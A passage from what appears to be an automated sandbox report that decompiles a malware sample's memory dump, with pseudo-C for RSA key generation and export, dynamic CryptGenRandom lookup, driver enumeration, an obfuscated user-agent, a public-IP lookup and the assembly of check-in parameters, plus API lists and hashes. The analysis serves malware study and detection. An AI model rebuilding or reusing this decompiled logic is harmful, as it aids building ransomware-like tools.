										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

0x00a87c70
0x00a87c72
0x00a87c77
0x00a87c7a
0x00a87c7d
0x00a87c85
0x00a87d79
0x00a87d81
0x00a87c8b
0x00a87c8b
0x00a87c90
0x00a87c90
0x00a87c93
0x00a87c98
0x00a87c99
0x00a87ca5
0x00a87ca5
0x00a87cab
0x00a87cb1
0x00a87cb5
0x00a87d87
0x00a87d95
0x00a87da3
0x00a87cc3
0x00a87cc6
0x00a87cce
0x00a87cd5
0x00a87cdc
0x00a87ce2
0x00a87ce6
0x00a87ced
0x00a87cf4
0x00a87cfb
0x00a87cff
0x00a87d07
0x00a87d17
0x00a87d17
0x00a87d1c
0x00a87d24
0x00000000
0x00a87d26
0x00a87d26
0x00a87d27
0x00a87d28
0x00a87d2f
0x00000000
0x00a87d31
0x00a87d31
0x00a87d35
0x00a87d37
0x00a87d3a
0x00a87d41
0x00a87d45
0x00a87d4e
0x00a87d52
0x00a87d53
0x00a87d41
0x00a87d57
0x00a87d57
0x00a87d2f
0x00a87d09
0x00a87d09
0x00a87d0d
0x00a87d15
0x00a87d5e
0x00a87d5e
0x00000000
0x00000000
0x00000000
0x00a87d15
0x00a87d65
0x00a87d73
0x00000000
0x00a87d73
0x00a87cb5

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00A87C7D
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00A87CAB
GetModuleHandleA.KERNEL32(?), ref: 00A87CFF
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00A87D0D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00A87D1C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A87D65
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A87D73
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A87D87
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A87D95

Strings

CryptGenRandomAdvapi32.dll, xrefs: 00A87D17, 00A87D1A
Advapi32.dll, xrefs: 00A87D09, 00A87D0C

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 6e7601a2a87b61c7b59cf3c37ccfe0e779a0e5c40691465b71cc238a2001cf27
Instruction ID: f2a2b3df1136c0770c405d5024f46308798e821db08674dcbdb77e4fdd660f73
Opcode Fuzzy Hash: 6e7601a2a87b61c7b59cf3c37ccfe0e779a0e5c40691465b71cc238a2001cf27
Instruction Fuzzy Hash: A531C571A04209ABDB20DFE5DC89BFFBB78FF04701F244069E505A62A0E771DA01CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A87DB0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A87DB0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				void* _t28;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000); // executed
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t28 = VirtualAlloc(0, _t40, 0x3000, 0x40); // executed
					_t47 = _t28;
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000); // executed
						goto L10;
					}
				}
			}

0x00a87dc0
0x00a87dc2
0x00a87dc7
0x00a87dcd
0x00a87dd0
0x00a87dd8
0x00a87ea2
0x00a87eaa
0x00a87dde
0x00a87dde
0x00a87de0
0x00a87de0
0x00a87de3
0x00a87de7
0x00a87de8
0x00a87df4
0x00a87df8
0x00a87dfe
0x00a87e02
0x00a87eb0
0x00a87ebe
0x00a87ecc
0x00a87e11
0x00a87e14
0x00a87e1c
0x00a87e23
0x00a87e2a
0x00a87e30
0x00a87e34
0x00a87e3b
0x00a87e42
0x00a87e49
0x00a87e4d
0x00a87e55
0x00a87e65
0x00a87e65
0x00a87e6a
0x00a87e72
0x00a87e7d
0x00a87e86
0x00a87e86
0x00a87e57
0x00a87e57
0x00a87e5b
0x00a87e63
0x00000000
0x00000000
0x00a87e63
0x00a87e8e
0x00a87e9c
0x00000000
0x00a87e9c
0x00a87e02

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00A87DD0
VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 00A87DF8
GetModuleHandleA.KERNEL32(?), ref: 00A87E4D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00A87E5B
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00A87E6A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A87E8E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A87E9C
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A8292B), ref: 00A87EB0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,00A8292B), ref: 00A87EBE

Strings

Advapi32.dll, xrefs: 00A87E57, 00A87E5A
CryptGenRandomAdvapi32.dll, xrefs: 00A87E65, 00A87E68

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 57e0debf4beb9f26985701132e1c9a0ff2fea56c894721f98e74c391a70acdbe
Instruction ID: 9ab4cfbdaa2fb64c6fee5f85a8324e780c2b8da6856716f2d960df8c4ff89339
Opcode Fuzzy Hash: 57e0debf4beb9f26985701132e1c9a0ff2fea56c894721f98e74c391a70acdbe
Instruction Fuzzy Hash: D4318F71A04209AFEB20DFE5DC4ABAEBB79EF44701F244169E605A6290D7709A01CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00A85D80 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00A85D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x00a85d91
0x00a85d95
0x00a85d9d
0x00a85dd5
0x00a85de3
0x00a85de7
0x00a85def
0x00a85def
0x00a85df2
0x00a85e0b
0x00a85e23
0x00a85e2d
0x00a85e39
0x00a85e4e
0x00000000
0x00a85e54
0x00a85d9f
0x00a85daa
0x00000000
0x00a85dce
0x00a85dbb
0x00a85dc3
0x00000000
0x00a85dcc
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00A8491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00A84916,?,00A8491E), ref: 00A85D95
GetLastError.KERNEL32(?,00A8491E), ref: 00A85D9F
CryptAcquireContextW.ADVAPI32(00A8491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,00A8491E), ref: 00A85DBB
CryptGenKey.ADVAPI32(00A8491E,0000A400,08000001,?,?,00A8491E), ref: 00A85DE7
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 00A85E0B
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 00A85E23
CryptDestroyKey.ADVAPI32(?), ref: 00A85E2D
CryptReleaseContext.ADVAPI32(00A8491E,00000000), ref: 00A85E39
CryptAcquireContextW.ADVAPI32(00A8491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 00A85E4E

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A85D8A, 00A85DB0, 00A85E43

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: 9a3409d27ff92e7898803d683966a8d01e06477c58b4090d4b1d41d3ee90a960
Instruction ID: ab5c875c07558e31304b0c56ce51f71984a02bfb2353860ee250b6491cb3c04e
Opcode Fuzzy Hash: 9a3409d27ff92e7898803d683966a8d01e06477c58b4090d4b1d41d3ee90a960
Instruction Fuzzy Hash: 6C21FC75B90308BBEB20DBE0DC4AFAB7779AB48B01F204544FB01EA1D0D6B59941DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A82F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00A82F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x00a82f5a
0x00a82f69
0x00a82f6d
0x00a82f74
0x00a82f76
0x00a82f7b
0x00a82f8d
0x00a82f93
0x00a82f97
0x00a82fa8
0x00a82fac
0x00a82ff2
0x00a82ffa
0x00a83008
0x00a82fae
0x00a82fb1
0x00a82fb3
0x00a82fb8
0x00a82fc0
0x00a82fc5
0x00a82fcf
0x00a82fd7
0x00000000
0x00a82fd9
0x00a82fe3
0x00a82feb
0x00a83011
0x00a83022
0x00000000
0x00000000
0x00000000
0x00a82feb
0x00000000
0x00a82fed
0x00a82fed
0x00a82fee
0x00a82fc0
0x00000000
0x00a82fb8
0x00a82f99
0x00a82f9e
0x00a82f9e
0x00a82f81
0x00a82f81
0x00a82f81
0x00000000

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 00A82F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A82F8D

Strings

iet, xrefs: 00A82FE3

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: iet
API String ID: 4140748134-2308090442
Opcode ID: b87e1460f7f283c4b784ce5146ab5f09188e0f189257e8b81e481f53e65a40a7
Instruction ID: 4727e964b1e66a81b6d3ab7b565df0feab2d03c7f099a53e991ed7a62f12fa11
Opcode Fuzzy Hash: b87e1460f7f283c4b784ce5146ab5f09188e0f189257e8b81e481f53e65a40a7
Instruction Fuzzy Hash: F2219832A44119BBEB10DB98AC89FFA77BCEB44711F1442A6FA04D6180DB719D159B90

Uniqueness

Uniqueness Score: -1.00%

Function 00A868F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A877F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A879D4
Part of subcall function 00A877F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 00A879ED

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,746566A0,?), ref: 00A8690F
lstrlenW.KERNEL32(00A903AC), ref: 00A8691C

Part of subcall function 00A87A00: InternetCloseHandle.WININET(?), ref: 00A87A13
Part of subcall function 00A87A00: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00A87A32

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,00A903B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 00A8694B
wsprintfW.USER32 ref: 00A86963
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,00A903B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 00A86979
InternetCloseHandle.WININET(?), ref: 00A86987

Strings

ipv4bot.whatismyipaddress.com, xrefs: 00A8693C
GET, xrefs: 00A86924

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: f3c6d8f2c4e37731652333d414388a1970123f67088d1471dc78374ca3905c67
Instruction ID: e6b12930916dbfc8ba4fb499ec22c55dcd7d165a0e9b48683a5141eca91a4107
Opcode Fuzzy Hash: f3c6d8f2c4e37731652333d414388a1970123f67088d1471dc78374ca3905c67
Instruction Fuzzy Hash: EF01B1357442017BDB20BBA29D8EFAF3E7CBB81B51F080524FA05E51C0DE709516C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00A877F0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A877F0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x00a87808
0x00a87814
0x00a8781f
0x00a87829
0x00a87833
0x00a8783d
0x00a87847
0x00a87851
0x00a8785b
0x00a87865
0x00a8786f
0x00a87879
0x00a87883
0x00a8788d
0x00a87897
0x00a878a1
0x00a878ab
0x00a878b5
0x00a878bf
0x00a878c9
0x00a878d3
0x00a878dd
0x00a878e7
0x00a878f1
0x00a878fb
0x00a87902
0x00a87909
0x00a87910
0x00a87917
0x00a8791e
0x00a87925
0x00a8792c
0x00a87933
0x00a8793a
0x00a87941
0x00a87948
0x00a8794f
0x00a87956
0x00a8795d
0x00a87964
0x00a8796b
0x00a87972
0x00a87979
0x00a87980
0x00a87987
0x00a8798e
0x00a87995
0x00a8799c
0x00a879a3
0x00a879aa
0x00a879b1
0x00a879b8
0x00a879bf
0x00a879c6
0x00a879cd
0x00a879d4
0x00a879d6
0x00a879db
0x00a879ed
0x00a879ef
0x00000000
0x00a879ef
0x00a879f8

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A879D4
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 00A879ED

Strings

, xrefs: 00A879A3
., xrefs: 00A87987
K, xrefs: 00A878F1
p, xrefs: 00A878D3
a, xrefs: 00A879B1
e, xrefs: 00A878DD
6, xrefs: 00A878B5
), xrefs: 00A878BF
3, xrefs: 00A87910
o, xrefs: 00A8796B
h, xrefs: 00A87964
l, xrefs: 00A87829
M, xrefs: 00A87814
0, xrefs: 00A87847
z, xrefs: 00A8781F
A, xrefs: 00A878C9
w, xrefs: 00A8786F
, xrefs: 00A87933
i, xrefs: 00A8785B
O, xrefs: 00A878AB
a, xrefs: 00A87833
(, xrefs: 00A87851
e, xrefs: 00A87941
a, xrefs: 00A879AA
, xrefs: 00A87917
d, xrefs: 00A87865
t, xrefs: 00A878FB
e, xrefs: 00A87972
5, xrefs: 00A8783D
7, xrefs: 00A879C6
6, xrefs: 00A8788D
, xrefs: 00A878A1
T, xrefs: 00A87925
3, xrefs: 00A879CD
8, xrefs: 00A8798E
, xrefs: 00A87879
5, xrefs: 00A879BF
5, xrefs: 00A87902
K, xrefs: 00A8791E
8, xrefs: 00A8799C
3, xrefs: 00A87995
i, xrefs: 00A879B8
o, xrefs: 00A87956
i, xrefs: 00A8793A
L, xrefs: 00A8792C
5, xrefs: 00A87979
c, xrefs: 00A8794F
., xrefs: 00A87980
T, xrefs: 00A87883
G, xrefs: 00A87948
1, xrefs: 00A87897
7, xrefs: 00A87909
, xrefs: 00A8795D
e, xrefs: 00A878E7

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: c4f9290b02f2a73394c48176815566b5b162ca600ebb600fe779211f7f60c950
Instruction ID: 5e2dd0fddb4cc9e1720aa2420b1dd350c77167db1f0668f0f7e56239872f03b5
Opcode Fuzzy Hash: c4f9290b02f2a73394c48176815566b5b162ca600ebb600fe779211f7f60c950
Instruction Fuzzy Hash: 0E41A8B4811368DEEB21CF91999879EBFF5BB04748F50819ED5086B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00A869A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A869A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x00a869a4
0x00a869a7
0x00a869b8
0x00a869c1
0x00a869c9
0x00a869d2
0x00a869da
0x00a869da
0x00a869df
0x00a869e5
0x00a869ed
0x00a869f3
0x00a869fb
0x00a869fb
0x00a86a01
0x00a86a07
